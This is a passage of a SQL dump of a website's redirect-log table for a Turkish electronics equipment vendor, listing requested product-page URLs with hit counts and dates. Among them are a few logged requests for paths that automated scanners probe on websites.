00:00:00',301),(26728,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',620,0,'2021-03-17 07:48:52','0000-00-00 00:00:00',301),(26729,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,category_name',NULL,'','',637,0,'2021-03-17 07:49:03','0000-00-00 00:00:00',301),(26730,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',643,0,'2021-03-17 07:49:06','0000-00-00 00:00:00',301),(26731,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,mf_name',NULL,'','',643,0,'2021-03-17 07:49:17','0000-00-00 00:00:00',301),(26732,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',637,0,'2021-03-17 07:49:20','0000-00-00 00:00:00',301),(26733,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,ordering',NULL,'','',631,0,'2021-03-17 07:49:31','0000-00-00 00:00:00',301),(26734,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,product_name',NULL,'','',616,0,'2021-03-17 07:49:38','0000-00-00 00:00:00',301),(26735,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',628,0,'2021-03-17 07:49:41','0000-00-00 00:00:00',301),(26736,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/by,product_sku',NULL,'','',580,0,'2021-03-17 07:49:51','0000-00-00 00:00:00',301),(26737,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±',NULL,'','',584,0,'2021-03-17 07:50:01','0000-00-00 00:00:00',301),(26738,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,`p`.product_sku',NULL,'','',591,0,'2021-03-17 07:50:05','0000-00-00 00:00:00',301),(26739,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',594,0,'2021-03-17 07:50:09','0000-00-00 00:00:00',301),(26740,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',633,0,'2021-03-17 07:50:10','0000-00-00 00:00:00',301),(26741,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,category_name',NULL,'','',581,0,'2021-03-17 07:50:30','0000-00-00 00:00:00',301),(26742,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,category_name/dirdesc',NULL,'','',570,0,'2021-03-17 07:50:34','0000-00-00 00:00:00',301),(26743,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,mf_name',NULL,'','',589,0,'2021-03-17 07:50:56','0000-00-00 00:00:00',301),(26744,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,mf_name',NULL,'','',610,0,'2021-03-17 07:50:58','0000-00-00 00:00:00',301),(26745,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,mf_name/dirdesc',NULL,'','',594,0,'2021-03-17 07:51:01','0000-00-00 00:00:00',301),(26746,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,ordering',NULL,'','',606,0,'2021-03-17 07:51:14','0000-00-00 00:00:00',301),(26747,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,product_name',NULL,'','',595,0,'2021-03-17 07:51:24','0000-00-00 00:00:00',301),(26748,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,product_name/dirdesc',NULL,'','',600,0,'2021-03-17 07:51:29','0000-00-00 00:00:00',301),(26749,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/by,product_sku',NULL,'','',589,0,'2021-03-17 07:51:45','0000-00-00 00:00:00',301),(26750,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',616,0,'2021-03-17 07:51:47','0000-00-00 00:00:00',301),(26751,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/cs40-detail',NULL,'','',297,0,'2021-03-17 07:51:56','0000-00-00 00:00:00',301),(26752,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/cs40-detail/askquestion?tmpl=component',NULL,'','',305,0,'2021-03-17 07:52:02','0000-00-00 00:00:00',301),(26753,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/dirdesc',NULL,'','',590,0,'2021-03-17 07:52:09','0000-00-00 00:00:00',301),(26754,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/le-40v-detail',NULL,'','',290,0,'2021-03-17 07:52:21','0000-00-00 00:00:00',301),(26755,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name/dirdesc',NULL,'','',573,0,'2021-03-17 07:52:26','0000-00-00 00:00:00',301),(26756,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2021-03-17 07:52:35','0000-00-00 00:00:00',301),(26757,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,mf_name',NULL,'','',575,0,'2021-03-17 07:52:41','0000-00-00 00:00:00',301),(26758,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim/by,mf_name/dirdesc',NULL,'','',580,0,'2021-03-17 07:52:47','0000-00-00 00:00:00',301),(26759,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z?language=tr-tr',NULL,'','',1,0,'2021-03-17 07:52:59','0000-00-00 00:00:00',301),(26760,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,ordering',NULL,'','',622,0,'2021-03-17 07:54:36','0000-00-00 00:00:00',301),(26761,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-17 07:54:47','0000-00-00 00:00:00',301),(26762,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/le-40v-detail',NULL,'','',319,0,'2021-03-17 07:54:50','0000-00-00 00:00:00',301),(26763,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,product_name',NULL,'','',619,0,'2021-03-17 07:56:36','0000-00-00 00:00:00',301),(26764,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',616,0,'2021-03-17 07:57:35','0000-00-00 00:00:00',301),(26765,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/cm-602-l-detail',NULL,'','',300,0,'2021-03-17 08:04:00','0000-00-00 00:00:00',301),(26766,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',304,0,'2021-03-17 08:04:46','0000-00-00 00:00:00',301),(26767,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/dirdesc',NULL,'','',602,0,'2021-03-17 08:05:43','0000-00-00 00:00:00',301),(26768,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/mx200lp-3-detail',NULL,'','',305,0,'2021-03-17 08:07:15','0000-00-00 00:00:00',301),(26769,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',303,0,'2021-03-17 08:08:22','0000-00-00 00:00:00',301),(26770,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/npm-detail',NULL,'','',295,0,'2021-03-17 08:09:01','0000-00-00 00:00:00',301),(26771,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/npm-detail/askquestion?tmpl=component',NULL,'','',302,0,'2021-03-17 08:10:01','0000-00-00 00:00:00',301),(26772,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim',NULL,'','',584,0,'2021-03-17 08:11:42','0000-00-00 00:00:00',301),(26773,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,`p`.product_sku',NULL,'','',584,0,'2021-03-17 08:12:33','0000-00-00 00:00:00',301),(26774,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',586,0,'2021-03-17 08:13:51','0000-00-00 00:00:00',301),(26775,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,category_name',NULL,'','',582,0,'2021-03-17 08:16:43','0000-00-00 00:00:00',301),(26776,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,mf_name',NULL,'','',576,0,'2021-03-17 08:20:56','0000-00-00 00:00:00',301),(26777,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,mf_name/dirdesc',NULL,'','',572,0,'2021-03-17 08:21:50','0000-00-00 00:00:00',301),(26778,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,ordering',NULL,'','',603,0,'2021-03-17 08:25:02','0000-00-00 00:00:00',301),(26779,'https://3s-technologies.com.tr/tr/welcome.html',NULL,'','',57,0,'2021-03-18 07:10:06','0000-00-00 00:00:00',301),(26780,'http://3s-technologies.com.tr/tr/wp/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-18 15:40:04','0000-00-00 00:00:00',301),(26781,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-18 15:40:05','0000-00-00 00:00:00',301),(26782,'http://3s-technologies.com.tr/tr/blog/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-18 15:40:05','0000-00-00 00:00:00',301),(26783,'https://3s-technologies.com.tr/en/aluminyum-işleme-aluminum-processing/',NULL,'','',6,0,'2021-03-19 01:46:16','0000-00-00 00:00:00',301),(26784,'https://3s-technologies.com.tr/en/akrilik-işleme-acrylic-processing/',NULL,'','',7,0,'2021-03-19 01:46:17','0000-00-00 00:00:00',301),(26785,'https://3s-technologies.com.tr/en/wood-processing-ahşap-işleme/',NULL,'','',6,0,'2021-03-19 01:46:19','0000-00-00 00:00:00',301),(26786,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/',NULL,'','',7,0,'2021-03-19 01:46:21','0000-00-00 00:00:00',301),(26787,'https://3s-technologies.com.tr/tr/80-turkish-tr/',NULL,'','',3,0,'2021-03-19 01:48:03','0000-00-00 00:00:00',301),(26788,'https://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/',NULL,'','',2,0,'2021-03-19 01:48:04','0000-00-00 00:00:00',301),(26789,'https://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'https://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',375,0,'2021-03-19 05:25:36','0000-00-00 00:00:00',301),(26790,'https://3s-technologies.com.tr/tr/urunler/user',NULL,'https://3s-technologies.com.tr/tr/urunler/user','',2,0,'2021-03-19 06:23:53','0000-00-00 00:00:00',301),(26791,'http://3s-technologies.com.tr/tr/templates/ja_purity/404.php',NULL,'http://3s-technologies.com.tr/templates/ja_purity/404.php','',2,0,'2021-03-19 13:06:04','0000-00-00 00:00:00',301),(26792,'http://3s-technologies.com.tr/tr/plugins/system/xtp.php',NULL,'http://3s-technologies.com.tr/plugins/system/xtp.php','',2,0,'2021-03-19 14:18:43','0000-00-00 00:00:00',301),(26793,'http://3s-technologies.com.tr/tr/post.php',NULL,'http://3s-technologies.com.tr/post.php','',202,0,'2021-03-19 15:10:39','0000-00-00 00:00:00',301),(26794,'http://3s-technologies.com.tr/tr/simplet.php',NULL,'http://3s-technologies.com.tr/simplet.php','',2,0,'2021-03-19 18:06:12','0000-00-00 00:00:00',301),(26795,'http://3s-technologies.com.tr/tr/check.php',NULL,'http://3s-technologies.com.tr/check.php','',9,0,'2021-03-19 18:44:54','0000-00-00 00:00:00',301),(26796,'http://3s-technologies.com.tr/tr/.info.php',NULL,'http://3s-technologies.com.tr/.info.php','',14,0,'2021-03-19 18:51:19','0000-00-00 00:00:00',301),(26797,'http://3s-technologies.com.tr/en/__media__/js/netsoltrademark.php?d=google.com',NULL,'','',2,0,'2021-03-19 19:02:11','0000-00-00 00:00:00',301),(26798,'http://3s-technologies.com.tr/tr/php.php',NULL,'http://3s-technologies.com.tr/php.php','',85,0,'2021-03-19 19:47:54','0000-00-00 00:00:00',301),(26799,'http://3s-technologies.com.tr/tr/wp-config-samsples.php',NULL,'http://3s-technologies.com.tr/wp-config-samsples.php','',3,0,'2021-03-19 19:48:30','0000-00-00 00:00:00',301),(26800,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',586,0,'2021-03-19 21:10:14','0000-00-00 00:00:00',301),(26801,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',586,0,'2021-03-19 21:10:28','0000-00-00 00:00:00',301),(26802,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2021-03-19 21:10:45','0000-00-00 00:00:00',301),(26803,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,category_name',NULL,'','',595,0,'2021-03-19 21:10:52','0000-00-00 00:00:00',301),(26804,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',594,0,'2021-03-19 21:11:02','0000-00-00 00:00:00',301),(26805,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,mf_name',NULL,'','',575,0,'2021-03-19 21:15:09','0000-00-00 00:00:00',301),(26806,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,mf_name/dirdesc',NULL,'','',570,0,'2021-03-19 21:15:18','0000-00-00 00:00:00',301),(26807,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,ordering',NULL,'','',569,0,'2021-03-19 21:15:42','0000-00-00 00:00:00',301),(26808,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_name',NULL,'','',574,0,'2021-03-19 21:16:00','0000-00-00 00:00:00',301),(26809,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_name/dirdesc',NULL,'','',579,0,'2021-03-19 21:16:09','0000-00-00 00:00:00',301),(26810,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_sku',NULL,'','',571,0,'2021-03-19 21:16:38','0000-00-00 00:00:00',301),(26811,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,category_name',NULL,'','',569,0,'2021-03-19 21:24:49','0000-00-00 00:00:00',301),(26812,'http://3s-technologies.com.tr/tr/skin/ini.php',NULL,'http://3s-technologies.com.tr/skin/ini.php','',1,0,'2021-03-20 01:01:45','0000-00-00 00:00:00',301),(26813,'http://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing',NULL,'','',5,0,'2021-03-20 02:56:32','0000-00-00 00:00:00',301),(26814,'http://www.3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing',NULL,'','',6,0,'2021-03-20 05:19:56','0000-00-00 00:00:00',301),(26815,'http://3s-technologies.com.tr/tr/res.php.suspected',NULL,'http://3s-technologies.com.tr/res.php.suspected','',2,0,'2021-03-20 05:21:30','0000-00-00 00:00:00',301),(26816,'http://3s-technologies.com.tr/tr/file.php',NULL,'http://3s-technologies.com.tr/file.php','',713,0,'2021-03-20 05:35:11','0000-00-00 00:00:00',301),(26817,'http://3s-technologies.com.tr/tr/js/lib.php',NULL,'http://3s-technologies.com.tr/js/lib.php','',1,0,'2021-03-20 06:45:17','0000-00-00 00:00:00',301),(26818,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2021-03-20 07:59:11','0000-00-00 00:00:00',301),(26819,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/dirdesc',NULL,'','',568,0,'2021-03-20 07:59:15','0000-00-00 00:00:00',301),(26820,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/e-bar-26-detail',NULL,'','',287,0,'2021-03-20 07:59:23','0000-00-00 00:00:00',301),(26821,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',289,0,'2021-03-20 07:59:28','0000-00-00 00:00:00',301),(26822,'https://3s-technologies.com.tr/index.php/en/products/ã§ubuk-lehim/e-bar-detail',NULL,'','',283,0,'2021-03-20 07:59:42','0000-00-00 00:00:00',301),(26823,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme',NULL,'','',570,0,'2021-03-20 07:59:49','0000-00-00 00:00:00',301),(26824,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,`p`.product_sku',NULL,'','',566,0,'2021-03-20 07:59:52','0000-00-00 00:00:00',301),(26825,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',563,0,'2021-03-20 07:59:57','0000-00-00 00:00:00',301),(26826,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,category_name',NULL,'','',564,0,'2021-03-20 08:00:08','0000-00-00 00:00:00',301),(26827,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bã¶lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',576,0,'2021-03-20 08:00:14','0000-00-00 00:00:00',301),(26828,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,mf_name',NULL,'','',577,0,'2021-03-20 08:00:27','0000-00-00 00:00:00',301),(26829,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',582,0,'2021-03-20 08:00:44','0000-00-00 00:00:00',301),(26830,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,ordering',NULL,'','',598,0,'2021-03-20 08:00:58','0000-00-00 00:00:00',301),(26831,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,product_name',NULL,'','',588,0,'2021-03-20 08:01:05','0000-00-00 00:00:00',301),(26832,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',593,0,'2021-03-20 08:01:09','0000-00-00 00:00:00',301),(26833,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/by,product_sku',NULL,'','',595,0,'2021-03-20 08:01:21','0000-00-00 00:00:00',301),(26834,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hä±zlä±/dirdesc',NULL,'','',584,0,'2021-03-20 08:01:28','0000-00-00 00:00:00',301),(26835,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z',NULL,'','',603,0,'2021-03-20 08:01:40','0000-00-00 00:00:00',301),(26836,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',575,0,'2021-03-20 08:01:43','0000-00-00 00:00:00',301),(26837,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',578,0,'2021-03-20 08:01:47','0000-00-00 00:00:00',301),(26838,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,category_name',NULL,'','',554,0,'2021-03-20 08:01:51','0000-00-00 00:00:00',301),(26839,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',556,0,'2021-03-20 08:01:54','0000-00-00 00:00:00',301),(26840,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,mf_name/dirdesc',NULL,'','',580,0,'2021-03-20 08:02:06','0000-00-00 00:00:00',301),(26841,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,ordering',NULL,'','',606,0,'2021-03-20 08:02:17','0000-00-00 00:00:00',301),(26842,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,product_name',NULL,'','',623,0,'2021-03-20 08:02:24','0000-00-00 00:00:00',301),(26843,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hä±z/by,product_name/dirdesc',NULL,'','',608,0,'2021-03-20 08:02:27','0000-00-00 00:00:00',301),(26844,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/cs40-detail',NULL,'','',299,0,'2021-03-20 08:03:06','0000-00-00 00:00:00',301),(26845,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/cs40-detail/askquestion?tmpl=component',NULL,'','',305,0,'2021-03-20 08:03:09','0000-00-00 00:00:00',301),(26846,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/dirdesc',NULL,'','',617,0,'2021-03-20 08:03:14','0000-00-00 00:00:00',301),(26847,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/ls60v-detail',NULL,'','',323,0,'2021-03-20 08:03:27','0000-00-00 00:00:00',301),(26848,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/ls60v-detail/askquestion?tmpl=component',NULL,'','',319,0,'2021-03-20 08:03:30','0000-00-00 00:00:00',301),(26849,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n',NULL,'','',618,0,'2021-03-20 08:03:38','0000-00-00 00:00:00',301),(26850,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',296,0,'2021-03-20 08:05:43','0000-00-00 00:00:00',301),(26851,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',291,0,'2021-03-20 08:05:47','0000-00-00 00:00:00',301),(26852,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/ly-8c-detail',NULL,'','',289,0,'2021-03-20 08:05:51','0000-00-00 00:00:00',301),(26853,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',301,0,'2021-03-20 08:05:56','0000-00-00 00:00:00',301),(26854,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±',NULL,'','',617,0,'2021-03-20 08:06:03','0000-00-00 00:00:00',301),(26855,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/am100-detail',NULL,'','',292,0,'2021-03-20 08:06:07','0000-00-00 00:00:00',301),(26856,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',584,0,'2021-03-20 08:06:15','0000-00-00 00:00:00',301),(26857,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',591,0,'2021-03-20 08:06:19','0000-00-00 00:00:00',301),(26858,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,category_name',NULL,'','',739,0,'2021-03-20 08:06:31','0000-00-00 00:00:00',301),(26859,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,mf_name',NULL,'','',606,0,'2021-03-20 08:07:03','0000-00-00 00:00:00',301),(26860,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',603,0,'2021-03-20 08:07:07','0000-00-00 00:00:00',301),(26861,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,ordering',NULL,'','',599,0,'2021-03-20 08:07:19','0000-00-00 00:00:00',301),(26862,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,product_name',NULL,'','',614,0,'2021-03-20 08:07:30','0000-00-00 00:00:00',301),(26863,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-20 08:07:34','0000-00-00 00:00:00',301),(26864,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,product_sku?language=tr-tr',NULL,'','',1,0,'2021-03-20 08:07:37','0000-00-00 00:00:00',301),(26865,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/dirdesc',NULL,'','',619,0,'2021-03-20 08:07:48','0000-00-00 00:00:00',301),(26866,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,category_name',NULL,'','',612,0,'2021-03-20 08:08:15','0000-00-00 00:00:00',301),(26867,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,product_name',NULL,'','',617,0,'2021-03-20 08:08:33','0000-00-00 00:00:00',301),(26868,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,product_name/dirdesc',NULL,'','',615,0,'2021-03-20 08:08:36','0000-00-00 00:00:00',301),(26869,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,product_sku',NULL,'','',609,0,'2021-03-20 08:08:53','0000-00-00 00:00:00',301),(26870,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/dirdesc',NULL,'','',614,0,'2021-03-20 08:09:04','0000-00-00 00:00:00',301),(26871,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/e-bar-26-detail',NULL,'','',312,0,'2021-03-20 08:09:15','0000-00-00 00:00:00',301),(26872,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',303,0,'2021-03-20 08:09:18','0000-00-00 00:00:00',301),(26873,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/e-bar-detail',NULL,'','',310,0,'2021-03-20 08:09:23','0000-00-00 00:00:00',301),(26874,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',295,0,'2021-03-20 08:09:27','0000-00-00 00:00:00',301),(26875,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fä±rä±n/dirdesc',NULL,'','',571,0,'2021-03-20 08:51:37','0000-00-00 00:00:00',301),(26876,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/le-40v-detail/askquestion?tmpl=component',NULL,'','',292,0,'2021-03-20 08:51:48','0000-00-00 00:00:00',301),(26877,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/ls60v-detail',NULL,'','',295,0,'2021-03-20 08:51:55','0000-00-00 00:00:00',301),(26878,'https://3s-technologies.com.tr/index.php/en/products/smd-dã¼åã¼k-hä±zlä±/ls60v-detail/askquestion?tmpl=component',NULL,'','',294,0,'2021-03-20 08:52:03','0000-00-00 00:00:00',301),(26879,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n',NULL,'','',597,0,'2021-03-20 08:52:20','0000-00-00 00:00:00',301),(26880,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',575,0,'2021-03-20 08:52:27','0000-00-00 00:00:00',301),(26881,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',568,0,'2021-03-20 08:52:34','0000-00-00 00:00:00',301),(26882,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,category_name',NULL,'','',572,0,'2021-03-20 08:53:04','0000-00-00 00:00:00',301),(26883,'https://3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',567,0,'2021-03-20 08:53:12','0000-00-00 